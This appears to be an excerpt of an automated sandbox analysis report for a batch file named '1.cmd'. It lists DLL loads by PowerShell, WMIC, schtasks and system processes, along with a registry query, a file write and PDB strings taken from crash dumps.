Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1.cmd

Static file information: File size 5214429 > 1048576

Source:	Binary string: System.Configuration.Install.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdbMZ source: WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdbame="P@ source: WER3551.tmp.dmp.28.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
